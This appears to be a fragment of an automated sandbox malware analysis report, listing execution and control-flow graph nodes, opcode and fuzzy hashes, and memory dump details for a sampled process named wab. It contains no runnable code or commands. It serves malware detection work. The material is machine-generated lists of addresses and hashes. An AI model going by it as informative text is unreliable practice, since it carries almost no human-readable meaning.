                                              • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                              • Instruction ID: 9e10a5a30b8c711bec4e762c8f844a67ef0aa016e97d09da7f7eb54ca550ed89
                                              • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                              • Instruction Fuzzy Hash: 4CF0F635100954FFC7029FA5CD0499FBBA8EF46350B2180BAE841F7210D674EE019B98

                                              Execution Graph

                                              Execution Coverage:12.6%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:22
                                              Total number of Limit Nodes:4
                                              execution_graph 24398 470848 24399 47084e 24398->24399 24400 47091b 24399->24400 24403 471380 24399->24403 24408 47148b 24399->24408 24404 47138c 24403->24404 24405 471480 24404->24405 24406 47148b LdrInitializeThunk 24404->24406 24413 477aa8 24404->24413 24405->24399 24406->24404 24409 471396 24408->24409 24410 471480 24408->24410 24409->24410 24411 47148b LdrInitializeThunk 24409->24411 24412 477aa8 LdrInitializeThunk 24409->24412 24410->24399 24411->24409 24412->24409 24414 477ab2 24413->24414 24415 477b12 24414->24415 24417 47f710 24414->24417 24415->24404 24418 47f739 24417->24418 24419 47f7af 24418->24419 24421 47f950 24418->24421 24422 47f955 24421->24422 24423 47f96a LdrInitializeThunk 24422->24423 24424 47f983 24422->24424 24423->24422 24424->24418

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 3a563c60-3a563c7d 1 3a563c7f-3a563c82 0->1 2 3a563d9f-3a563de1 1->2 3 3a563c88-3a563c8b 1->3 34 3a563de3-3a563e02 2->34 35 3a563e31-3a563e40 2->35 4 3a563cb3-3a563cb6 3->4 5 3a563c8d-3a563cae call 3a562edc 3->5 7 3a563d27-3a563d2a 4->7 8 3a563cb8-3a563d22 4->8 5->4 11 3a563d3c-3a563d3f 7->11 12 3a563d2c-3a563d37 7->12 8->7 15 3a563d41-3a563d49 11->15 16 3a563d59-3a563d5c 11->16 12->11 84 3a563d4b call 3a563c60 15->84 85 3a563d4b call 3a563df0 15->85 17 3a563d5e-3a563d62 16->17 18 3a563d69-3a563d6c 16->18 22 3a563d64 17->22 23 3a563d92-3a563d9c 17->23 24 3a563d80-3a563d82 18->24 25 3a563d6e-3a563d7b 18->25 20 3a563d51-3a563d54 20->16 22->18 27 3a563d84 24->27 28 3a563d89-3a563d8c 24->28 25->24 27->28 28->1 28->23 37 3a563e04-3a563e07 34->37 41 3a563e45-3a563e48 35->41 39 3a563e0d-3a563e10 37->39 40 3a563eb8-3a563ef0 37->40 43 3a563e12-3a563e17 39->43 44 3a563e1a-3a563e1d 39->44 45 3a563ef7-3a563f9d 40->45 41->45 46 3a563e4e-3a563e51 41->46 43->44 48 3a563e1f-3a563e21 44->48 49 3a563e2c-3a563e2f 44->49 76 3a563f9f-3a563fa5 45->76 77 3a563fa8-3a563fae 45->77 50 3a563e53-3a563e69 call 3a562ee8 46->50 51 3a563e6e-3a563e71 46->51 53 3a563e27 48->53 54 3a563eae-3a563eb5 48->54 49->35 49->41 50->51 57 3a563e73-3a563e82 call 3a562ee8 51->57 58 3a563e8e-3a563e91 51->58 53->49 69 3a563e87-3a563e89 57->69 63 3a563e93-3a563e95 58->63 64 3a563e9c-3a563e9e 58->64 63->35 70 3a563e97 63->70 65 3a563ea5-3a563ea8 64->65 66 3a563ea0 64->66 65->37 65->54 66->65 69->58 70->64 76->77 78 3a563fb0-3a563fbc 77->78 79 3a563fbe-3a563ffc 77->79 78->79 81 3a564005-3a564019 79->81 82 3a563ffe-3a564004 79->82 82->81 84->20 85->20
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D@D$D@D$D@D
                                              • API String ID: 0-2794098928
                                              • Opcode ID: 2e443ff42e46641b44459ff9c34c3af77173abf249cabb61b422256cfe4440e4
                                              • Instruction ID: b09b50d26980046dbbececc28ca2727e10d13cf57c8ab9c491ecf99e00d6c235
                                              • Opcode Fuzzy Hash: 2e443ff42e46641b44459ff9c34c3af77173abf249cabb61b422256cfe4440e4
                                              • Instruction Fuzzy Hash: 94B1CF75A002199FEB14DFA9C8507AEBBB6FF88324F54452AE506EB390C7359D01CBD1
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 95597d81db34c9dbf937d86dde131c8ca789d04350b06143f5ce67ff3db0da9c
                                              • Instruction ID: 62b72aabcc530535b522a9e8dfa6e7e86966326716d407272d058a94bc1673c0
                                              • Opcode Fuzzy Hash: 95597d81db34c9dbf937d86dde131c8ca789d04350b06143f5ce67ff3db0da9c
                                              • Instruction Fuzzy Hash: E6333E31D107198EDB15EF68C8805ADF7B1FF99300F15D69AE449BB221EB70AAC5CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2572 3a56e140-3a56e160 2573 3a56e162-3a56e165 2572->2573 2574 3a56e167-3a56e16a 2573->2574 2575 3a56e1e1-3a56e1ea 2573->2575 2576 3a56e196-3a56e199 2574->2576 2577 3a56e16c-3a56e191 2574->2577 2578 3a56e1f0 2575->2578 2579 3a56e3a1-3a56e3aa 2575->2579 2581 3a56e1a3-3a56e1a6 2576->2581 2582 3a56e19b-3a56e19e 2576->2582 2577->2576 2580 3a56e1f5-3a56e1f8 2578->2580 2583 3a56e4d3-3a56e50d 2579->2583 2584 3a56e3b0-3a56e3b4 2579->2584 2586 3a56e1fa-3a56e213 2580->2586 2587 3a56e218-3a56e21b 2580->2587 2588 3a56e1be-3a56e1c1 2581->2588 2589 3a56e1a8-3a56e1b9 2581->2589 2582->2581 2606 3a56e50f-3a56e512 2583->2606 2590 3a56e3b9-3a56e3bc 2584->2590 2586->2587 2594 3a56e246-3a56e249 2587->2594 2595 3a56e21d-3a56e241 2587->2595 2591 3a56e1c7-3a56e1ca 2588->2591 2592 3a56e2ad-3a56e2b6 2588->2592 2589->2588 2596 3a56e3d4-3a56e3d7 2590->2596 2597 3a56e3be-3a56e3cd 2590->2597 2598 3a56e1dc-3a56e1df 2591->2598 2599 3a56e1cc-3a56e1d7 2591->2599 2604 3a56e2c2-3a56e2cb 2592->2604 2605 3a56e2b8 2592->2605 2602 3a56e26c-3a56e26f 2594->2602 2603 3a56e24b-3a56e267 2594->2603 2595->2594 2600 3a56e3f7-3a56e3fa 2596->2600 2601 3a56e3d9-3a56e3f2 2596->2601 2622 3a56e3cf 2597->2622 2623 3a56e43a-3a56e43d 2597->2623 2598->2575 2598->2580 2599->2598 2614 3a56e412-3a56e415 2600->2614 2615 3a56e3fc-3a56e40d 2600->2615 2601->2600 2618 3a56e271-3a56e274 2602->2618 2619 3a56e279-3a56e27c 2602->2619 2603->2602 2604->2583 2611 3a56e2d1-3a56e2d8 2604->2611 2610 3a56e2bd-3a56e2c0 2605->2610 2616 3a56e514-3a56e52d 2606->2616 2617 3a56e53e-3a56e541 2606->2617 2610->2604 2621 3a56e2dd-3a56e2e0 2610->2621 2611->2621 2627 3a56e417-3a56e430 2614->2627 2628 3a56e435-3a56e438 2614->2628 2615->2614 2668 3a56e5c7-3a56e5d3 2616->2668 2669 3a56e533-3a56e53d 2616->2669 2631 3a56e543-3a56e55c 2617->2631 2632 3a56e561-3a56e564 2617->2632 2618->2619 2629 3a56e27e-3a56e2a3 2619->2629 2630 3a56e2a8-3a56e2ab 2619->2630 2635 3a56e2e2-3a56e306 2621->2635 2636 3a56e30b-3a56e30e 2621->2636 2622->2596 2640 3a56e442-3a56e445 2623->2640 2627->2628 2628->2623 2628->2640 2629->2630 2630->2592 2630->2610 2631->2632 2633 3a56e566-3a56e570 2632->2633 2634 3a56e571-3a56e574 2632->2634 2643 3a56e576-3a56e592 2634->2643 2644 3a56e597-3a56e59a 2634->2644 2635->2636 2645 3a56e337-3a56e33a 2636->2645 2646 3a56e310-3a56e332 2636->2646 2641 3a56e447-3a56e44c 2640->2641 2642 3a56e44f-3a56e452 2640->2642 2641->2642 2651 3a56e454-3a56e459 2642->2651 2652 3a56e45c-3a56e45f 2642->2652 2643->2644 2653 3a56e5b5-3a56e5b7 2644->2653 2654 3a56e59c-3a56e5aa 2644->2654 2657 3a56e39c-3a56e39f 2645->2657 2658 3a56e33c-3a56e397 2645->2658 2646->2645 2651->2652 2662 3a56e461-3a56e467 2652->2662 2663 3a56e46c-3a56e46f 2652->2663 2665 3a56e5be-3a56e5c1 2653->2665 2666 3a56e5b9 2653->2666 2654->2616 2681 3a56e5b0 2654->2681 2657->2579 2657->2590 2658->2657 2662->2663 2670 3a56e471-3a56e48a 2663->2670 2671 3a56e48f-3a56e492 2663->2671 2665->2606 2665->2668 2666->2665 2674 3a56e774-3a56e77e 2668->2674 2675 3a56e5d9-3a56e5e2 2668->2675 2670->2671 2679 3a56e4a6-3a56e4a9 2671->2679 2680 3a56e494-3a56e49b 2671->2680 2682 3a56e77f-3a56e7b6 2675->2682 2683 3a56e5e8-3a56e608 2675->2683 2687 3a56e4b6-3a56e4b8 2679->2687 2688 3a56e4ab-3a56e4b1 2679->2688 2680->2582 2686 3a56e4a1 2680->2686 2681->2653 2697 3a56e7b8-3a56e7bb 2682->2697 2705 3a56e762-3a56e76e 2683->2705 2706 3a56e60e-3a56e617 2683->2706 2686->2679 2692 3a56e4bf-3a56e4c2 2687->2692 2693 3a56e4ba 2687->2693 2688->2687 2692->2573 2698 3a56e4c8-3a56e4d2 2692->2698 2693->2692 2699 3a56e7c1-3a56e7cf 2697->2699 2700 3a56e978-3a56e97b 2697->2700 2707 3a56e7d6-3a56e7d8 2699->2707 2703 3a56e99e-3a56e9a0 2700->2703 2704 3a56e97d-3a56e999 2700->2704 2708 3a56e9a7-3a56e9aa 2703->2708 2709 3a56e9a2 2703->2709 2704->2703 2705->2674 2705->2675 2706->2682 2710 3a56e61d-3a56e64d 2706->2710 2713 3a56e7ef-3a56e819 2707->2713 2714 3a56e7da-3a56e7dd 2707->2714 2708->2697 2715 3a56e9b0-3a56e9b9 2708->2715 2709->2708 2726 3a56e68f-3a56e6a5 2710->2726 2727 3a56e64f-3a56e687 2710->2727 2724 3a56e81f-3a56e828 2713->2724 2725 3a56e96d-3a56e977 2713->2725 2714->2715 2728 3a56e946-3a56e96b 2724->2728 2729 3a56e82e-3a56e93e 2724->2729 2734 3a56e6a7-3a56e6bb 2726->2734 2735 3a56e6c3-3a56e6d9 2726->2735 2727->2726 2728->2715 2728->2725 2729->2724 2777 3a56e944 2729->2777 2734->2735 2743 3a56e6f7-3a56e70a 2735->2743 2744 3a56e6db-3a56e6ef 2735->2744 2750 3a56e70c-3a56e716 2743->2750 2751 3a56e718 2743->2751 2744->2743 2752 3a56e71d-3a56e71f 2750->2752 2751->2752 2754 3a56e750-3a56e75c 2752->2754 2755 3a56e721-3a56e726 2752->2755 2754->2705 2754->2706 2757 3a56e734 2755->2757 2758 3a56e728-3a56e732 2755->2758 2759 3a56e739-3a56e73b 2757->2759 2758->2759 2759->2754 2760 3a56e73d-3a56e749 2759->2760 2760->2754 2777->2725
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45e58a11112dd7dfc12123efba62f32b8268b4a89b4b5b992910d34f485211a0
                                              • Instruction ID: 0b51a48cf45d79120649cda7b2268294f88168624262e655f4a6300bab7deb75
                                              • Opcode Fuzzy Hash: 45e58a11112dd7dfc12123efba62f32b8268b4a89b4b5b992910d34f485211a0
                                              • Instruction Fuzzy Hash: 85328134B02245CFEB44DBA8C490B9EB7B3EB88354F149469E905EB391DB35EC46CB90

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2999 3a5677d0-3a5677ed 3000 3a5677ef-3a5677f2 2999->3000 3001 3a5677f4-3a5677f5 3000->3001 3002 3a5677fa-3a5677fd 3000->3002 3001->3002 3003 3a5678e7-3a5678ed 3002->3003 3004 3a567803-3a567806 3002->3004 3005 3a56789f-3a5678a5 3003->3005 3006 3a5678ef 3003->3006 3007 3a567825-3a567828 3004->3007 3008 3a567808-3a567816 3004->3008 3011 3a5679b7-3a5679e3 3005->3011 3012 3a5678ab-3a5678b6 3005->3012 3013 3a5678f4-3a5678f7 3006->3013 3009 3a567834-3a567837 3007->3009 3010 3a56782a-3a567833 3007->3010 3014 3a56781d-3a567820 3008->3014 3015 3a56784e-3a567851 3009->3015 3016 3a567839-3a567849 3009->3016 3039 3a5679ed-3a5679f0 3011->3039 3012->3011 3017 3a5678bc-3a5678c9 3012->3017 3018 3a567901-3a567904 3013->3018 3019 3a5678f9-3a5678fe 3013->3019 3014->3007 3021 3a567853-3a567859 3015->3021 3022 3a56785e-3a567861 3015->3022 3016->3015 3017->3011 3020 3a5678cf-3a5678d3 3017->3020 3024 3a567906-3a567907 3018->3024 3025 3a56790c-3a56790f 3018->3025 3019->3018 3029 3a5678d8-3a5678db 3020->3029 3021->3022 3030 3a567872-3a567875 3022->3030 3031 3a567863-3a567867 3022->3031 3024->3025 3026 3a567911-3a567914 3025->3026 3027 3a56791f-3a567922 3025->3027 3026->3008 3032 3a56791a 3026->3032 3033 3a567946-3a567949 3027->3033 3034 3a567924-3a567941 3027->3034 3035 3a5678e2-3a5678e5 3029->3035 3036 3a5678dd-3a5678df 3029->3036 3030->3026 3040 3a56787b-3a56787e 3030->3040 3037 3a56786d 3031->3037 3038 3a5679a9-3a5679b6 3031->3038 3032->3027 3041 3a567961-3a567964 3033->3041 3042 3a56794b-3a56795c 3033->3042 3034->3033 3035->3003 3035->3013 3036->3035 3037->3030 3043 3a5679f2-3a5679fc 3039->3043 3044 3a567a01-3a567a04 3039->3044 3045 3a567880-3a567895 3040->3045 3046 3a56789a-3a56789d 3040->3046 3050 3a567966-3a56797c 3041->3050 3051 3a567981-3a567984 3041->3051 3042->3041 3043->3044 3047 3a567a26-3a567a29 3044->3047 3048 3a567a06-3a567a0a 3044->3048 3045->3046 3046->3005 3046->3029 3057 3a567a33-3a567a36 3047->3057 3058 3a567a2b-3a567a32 3047->3058 3053 3a567a10-3a567a18 3048->3053 3054 3a567ada-3a567b13 3048->3054 3050->3051 3055 3a567986-3a56798c 3051->3055 3056 3a567997-3a567999 3051->3056 3053->3054 3061 3a567a1e-3a567a21 3053->3061 3078 3a567b15-3a567b18 3054->3078 3055->3024 3062 3a567992 3055->3062 3063 3a5679a0-3a5679a3 3056->3063 3064 3a56799b 3056->3064 3065 3a567a58-3a567a5b 3057->3065 3066 3a567a38-3a567a3c 3057->3066 3061->3047 3062->3056 3063->3000 3063->3038 3064->3063 3070 3a567a5d-3a567a64 3065->3070 3071 3a567a6b-3a567a6e 3065->3071 3066->3054 3069 3a567a42-3a567a4a 3066->3069 3069->3054 3073 3a567a50-3a567a53 3069->3073 3074 3a567a66 3070->3074 3075 3a567ad2-3a567ad9 3070->3075 3076 3a567a86-3a567a89 3071->3076 3077 3a567a70-3a567a81 3071->3077 3073->3065 3074->3071 3081 3a567aa3-3a567aa6 3076->3081 3082 3a567a8b-3a567a8f 3076->3082 3077->3076 3079 3a567b37-3a567b3a 3078->3079 3080 3a567b1a-3a567b2c 3078->3080 3084 3a567b3c-3a567b4e 3079->3084 3085 3a567b59-3a567b5c 3079->3085 3096 3a567e64-3a567e69 3080->3096 3097 3a567b32 3080->3097 3086 3a567ac0-3a567ac2 3081->3086 3087 3a567aa8-3a567aac 3081->3087 3082->3054 3083 3a567a91-3a567a99 3082->3083 3083->3054 3090 3a567a9b-3a567a9e 3083->3090 3084->3096 3105 3a567b54 3084->3105 3094 3a567b5e-3a567b61 3085->3094 3095 3a567b9b-3a567d07 3085->3095 3092 3a567ac4 3086->3092 3093 3a567ac9-3a567acc 3086->3093 3087->3054 3091 3a567aae-3a567ab6 3087->3091 3090->3081 3091->3054 3099 3a567ab8-3a567abb 3091->3099 3092->3093 3093->3039 3093->3075 3100 3a567b63-3a567b75 3094->3100 3101 3a567b80-3a567b83 3094->3101 3148 3a567e3f-3a567e52 3095->3148 3149 3a567d0d-3a567d14 3095->3149 3103 3a567e6c-3a567e6f 3096->3103 3097->3079 3099->3086 3100->3096 3115 3a567b7b 3100->3115 3101->3095 3102 3a567b85-3a567b88 3101->3102 3106 3a567b92-3a567b95 3102->3106 3107 3a567b8a-3a567b8f 3102->3107 3108 3a567e71-3a567e83 3103->3108 3109 3a567e8e-3a567e91 3103->3109 3105->3085 3106->3095 3111 3a567e55-3a567e58 3106->3111 3107->3106 3108->3100 3123 3a567e89 3108->3123 3113 3a567e93-3a567ea5 3109->3113 3114 3a567eac-3a567eaf 3109->3114 3119 3a567e5f-3a567e62 3111->3119 3120 3a567e5a-3a567e5c 3111->3120 3118 3a567eb1-3a567ec4 3113->3118 3127 3a567ea7 3113->3127 3117 3a567ec7-3a567ec9 3114->3117 3114->3118 3115->3101 3121 3a567ed0-3a567ed3 3117->3121 3122 3a567ecb 3117->3122 3119->3096 3119->3103 3120->3119 3121->3078 3126 3a567ed9-3a567ee2 3121->3126 3122->3121 3123->3109 3127->3114 3150 3a567dc7-3a567dce 3149->3150 3151 3a567d1a-3a567d4c 3149->3151 3150->3148 3152 3a567dd0-3a567e03 3150->3152 3162 3a567d51-3a567d92 3151->3162 3163 3a567d4e 3151->3163 3164 3a567e05 3152->3164 3165 3a567e08-3a567e35 3152->3165 3173 3a567d94-3a567da5 3162->3173 3174 3a567daa-3a567dbb 3162->3174 3163->3162 3164->3165 3165->3126 3165->3148 3173->3126 3174->3126
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a6f6b7b9c8a9d99cba58eef9ffaf2683c458b28ec719588b3b9e5cd9f77ee28
                                              • Instruction ID: f21249e54171fe02f8dcc9b2535006cb220fef2b884388bb619b1507cbcc273b
                                              • Opcode Fuzzy Hash: 5a6f6b7b9c8a9d99cba58eef9ffaf2683c458b28ec719588b3b9e5cd9f77ee28
                                              • Instruction Fuzzy Hash: D8121575F002049FEB10DB64C88069EBBB2EF86358F189479D856EB365DB34ED46CB90
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: eefed2ca11f8784c5d97628d4ad5dbe23c6c9806e6cb732f9f426fb957206089
                                              • Instruction ID: 99b5316b07b91a4c726811c259e65a3daaa8bd4f470ea82b1b6500d2c090ad39
                                              • Opcode Fuzzy Hash: eefed2ca11f8784c5d97628d4ad5dbe23c6c9806e6cb732f9f426fb957206089
                                              • Instruction Fuzzy Hash: A722A379F005098BEB50DBA8C49079DB7B2FB89354F689A26E405FB3A1DA34DC41CB91

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3394 3a565698-3a5656b9 3395 3a5656bb-3a5656be 3394->3395 3396 3a5656e4-3a5656e7 3395->3396 3397 3a5656c0-3a5656df 3395->3397 3398 3a5656ed-3a56570c 3396->3398 3399 3a565e88-3a565e8a 3396->3399 3397->3396 3407 3a565725-3a56572f 3398->3407 3408 3a56570e-3a565711 3398->3408 3400 3a565e91-3a565e94 3399->3400 3401 3a565e8c 3399->3401 3400->3395 3404 3a565e9a-3a565ea3 3400->3404 3401->3400 3411 3a565735-3a565750 call 3a562ff0 3407->3411 3408->3407 3409 3a565713-3a565723 3408->3409 3409->3411 3415 3a565752-3a565758 3411->3415 3416 3a56575d-3a565a3a 3411->3416 3415->3404 3437 3a565a40-3a565aef 3416->3437 3438 3a565e7a-3a565e87 3416->3438 3447 3a565af1-3a565b16 3437->3447 3448 3a565b18 3437->3448 3450 3a565b21-3a565b2a call 3a562ffc 3447->3450 3448->3450 3452 3a565b2f-3a565b34 3450->3452 3453 3a565e61-3a565e6d 3452->3453 3454 3a565b3a-3a565b5c call 3a563008 3452->3454 3453->3437 3455 3a565e73 3453->3455 3454->3453 3458 3a565b62-3a565b6c 3454->3458 3455->3438 3458->3453 3459 3a565b72-3a565b7d 3458->3459 3459->3453 3460 3a565b83-3a565c59 3459->3460 3472 3a565c67-3a565c97 3460->3472 3473 3a565c5b-3a565c5d 3460->3473 3477 3a565ca5-3a565cb1 3472->3477 3478 3a565c99-3a565c9b 3472->3478 3473->3472 3479 3a565cb3-3a565cb7 3477->3479 3480 3a565d11-3a565d15 3477->3480 3478->3477 3479->3480 3483 3a565cb9-3a565ce3 3479->3483 3481 3a565e52-3a565e5b 3480->3481 3482 3a565d1b-3a565d57 3480->3482 3481->3453 3481->3460 3495 3a565d65-3a565d73 3482->3495 3496 3a565d59-3a565d5b 3482->3496 3490 3a565ce5-3a565ce7 3483->3490 3491 3a565cf1-3a565d0e call 3a563014 3483->3491 3490->3491 3491->3480 3498 3a565d75-3a565d80 3495->3498 3499 3a565d8a-3a565d95 3495->3499 3496->3495 3498->3499 3502 3a565d82 3498->3502 3503 3a565d97-3a565d9d 3499->3503 3504 3a565dad-3a565dbe 3499->3504 3502->3499 3505 3a565da1-3a565da3 3503->3505 3506 3a565d9f 3503->3506 3508 3a565dd6-3a565de2 3504->3508 3509 3a565dc0-3a565dc6 3504->3509 3505->3504 3506->3504 3513 3a565de4-3a565dea 3508->3513 3514 3a565dfa-3a565e4b 3508->3514 3510 3a565dca-3a565dcc 3509->3510 3511 3a565dc8 3509->3511 3510->3508 3511->3508 3515 3a565dee-3a565df0 3513->3515 3516 3a565dec 3513->3516 3514->3481 3515->3514 3516->3514
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a101cc7f2a85da6a2d916ef0c675fd3226005e4444e1e055c6e04c3a33e31a8c
                                              • Instruction ID: 9fda5f49622f313e383f74fc2755a202554e3ef565908711e813deadd350674e
                                              • Opcode Fuzzy Hash: a101cc7f2a85da6a2d916ef0c675fd3226005e4444e1e055c6e04c3a33e31a8c
                                              • Instruction Fuzzy Hash: D7323034E1071ACBDB14EFB5C89059DB7B6FFC9300F54D6AAD409A7264EB709985CB80

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 86 3a563652-3a56368d 87 3a56368f-3a563692 86->87 88 3a563694-3a5636a7 call 3a563c60 87->88 89 3a5636b5-3a5636b8 87->89 92 3a5636ad-3a5636b0 88->92 90 3a5636ba-3a5636c0 89->90 91 3a5636cb-3a5636ce 89->91 93 3a563746-3a563748 90->93 94 3a5636c6 90->94 95 3a5636d0-3a5636d8 91->95 96 3a5636dd-3a5636e0 91->96 92->89 99 3a563785-3a56378d call 3a562e98 93->99 100 3a56374a 93->100 94->91 95->96 97 3a5636e6-3a5636e9 96->97 98 3a563897-3a5638cf 96->98 101 3a56372b-3a56372e 97->101 102 3a5636eb-3a563726 call 3a562e80 97->102 108 3a5638d6-3a56390e 98->108 116 3a563792-3a563795 99->116 104 3a56374f-3a563752 100->104 101->108 109 3a563734-3a563737 101->109 102->101 111 3a563754-3a56375e call 3a562e8c 104->111 112 3a563763-3a563766 104->112 135 3a563915-3a563959 108->135 114 3a563741-3a563744 109->114 115 3a563739-3a56373e 109->115 111->112 118 3a563780-3a563783 112->118 119 3a563768-3a56377b 112->119 114->93 114->104 115->114 121 3a563797-3a5637c7 call 3a562e80 116->121 122 3a5637cc-3a5637cf 116->122 118->99 118->116 119->118 121->122 127 3a5637d1-3a5637d3 122->127 128 3a5637da-3a5637dd 122->128 127->119 131 3a5637d5 127->131 132 3a563805-3a563808 128->132 133 3a5637df-3a5637f1 128->133 131->128 132->135 136 3a56380e-3a563811 132->136 209 3a5637f7 call 3a5639b5 133->209 210 3a5637f7 call 3a563652 133->210 156 3a56395b-3a563961 135->156 157 3a5639a9 135->157 139 3a563813-3a56382f call 3a5642d0 136->139 140 3a56384a-3a56384d 136->140 137 3a5637fd-3a563800 137->132 146 3a563835-3a563845 139->146 143 3a563875-3a563877 140->143 144 3a56384f-3a563870 140->144 147 3a56387e-3a563881 143->147 148 3a563879 143->148 144->143 146->140 147->87 151 3a563887-3a563894 147->151 148->147 158 3a563963-3a56397a 156->158 159 3a5639b1 156->159 160 3a5639ae 157->160 161 3a56397c-3a56397f 158->161 162 3a5639b3-3a5639b8 159->162 163 3a5639bb-3a5639be 159->163 160->159 167 3a563981-3a563983 161->167 168 3a56398e-3a563991 161->168 162->163 165 3a5639c0-3a5639c3 163->165 166 3a563a29-3a563a61 163->166 172 3a5639c5-3a5639c7 165->172 173 3a5639ce-3a5639d1 165->173 186 3a563a68-3a563b0d 166->186 169 3a563a1e-3a563a26 167->169 170 3a563989 167->170 168->160 171 3a563993-3a5639a7 call 3a562ea4 168->171 170->168 171->157 175 3a5639d3-3a5639e7 172->175 176 3a5639c9 172->176 173->175 177 3a5639ec-3a5639ef 173->177 175->177 176->173 180 3a563a07-3a563a0a 177->180 181 3a5639f1-3a5639fb call 3a562eb0 177->181 185 3a563a0c-3a563a0e 180->185 180->186 187 3a563a00-3a563a02 181->187 188 3a563a15-3a563a18 185->188 189 3a563a10 185->189 199 3a563b15-3a563b1b 186->199 200 3a563b0f-3a563b12 186->200 187->180 188->161 188->169 189->188 201 3a563b1d-3a563b26 199->201 202 3a563b29-3a563b48 199->202 200->199 201->202 203 3a563b4e-3a563b59 202->203 204 3a563b62-3a563b76 203->204 205 3a563b5b-3a563b61 203->205 205->204 209->137 210->137
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D@D$D@D$D@D
                                              • API String ID: 0-2794098928
                                              • Opcode ID: 006425c5406135622587c4b61008a0077fec6ba2514af055d40b3fcf64648092
                                              • Instruction ID: 91ca1f50063afb1d064cb7d4cd0acfdabc668b47e80a48e2546f2e251ae9ec57
                                              • Opcode Fuzzy Hash: 006425c5406135622587c4b61008a0077fec6ba2514af055d40b3fcf64648092
                                              • Instruction Fuzzy Hash: C291E474B002199FEB15DFA4C890B9EBBB2FF85314F544969E54AEB2A0C734ED41CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1266 3a5639b5-3a5639b8 1267 3a5639bb-3a5639be 1266->1267 1268 3a5639c0-3a5639c3 1267->1268 1269 3a563a29-3a563a61 1267->1269 1270 3a5639c5-3a5639c7 1268->1270 1271 3a5639ce-3a5639d1 1268->1271 1282 3a563a68-3a563b0d 1269->1282 1272 3a5639d3-3a5639e7 1270->1272 1273 3a5639c9 1270->1273 1271->1272 1274 3a5639ec-3a5639ef 1271->1274 1272->1274 1273->1271 1276 3a563a07-3a563a0a 1274->1276 1277 3a5639f1-3a5639fb call 3a562eb0 1274->1277 1281 3a563a0c-3a563a0e 1276->1281 1276->1282 1283 3a563a00-3a563a02 1277->1283 1284 3a563a15-3a563a18 1281->1284 1285 3a563a10 1281->1285 1307 3a563b15-3a563b1b 1282->1307 1308 3a563b0f-3a563b12 1282->1308 1283->1276 1289 3a563a1e-3a563a26 1284->1289 1290 3a56397c-3a56397f 1284->1290 1285->1284 1291 3a563981-3a563983 1290->1291 1292 3a56398e-3a563991 1290->1292 1291->1289 1293 3a563989 1291->1293 1294 3a563993-3a5639a9 call 3a562ea4 1292->1294 1295 3a5639ae-3a5639b1 1292->1295 1293->1292 1294->1295 1295->1267 1301 3a5639b3 1295->1301 1301->1266 1309 3a563b1d-3a563b26 1307->1309 1310 3a563b29-3a563b48 1307->1310 1308->1307 1309->1310 1311 3a563b4e-3a563b59 1310->1311 1312 3a563b62-3a563b76 1311->1312 1313 3a563b5b-3a563b61 1311->1313 1313->1312
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.127080935491.000000003A560000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A560000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_3a560000_wab.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: D@D$D@D
                                              • API String ID: 0-1443409160
                                              • Opcode ID: 48f661b86fd770b075732da395886f737309700eb053da4908a32023d5338128
                                              • Instruction ID: 077e02cc117fc92be1f984f3f2b69ae27d79cd1d4a8eb0c901083b82fcc07b26
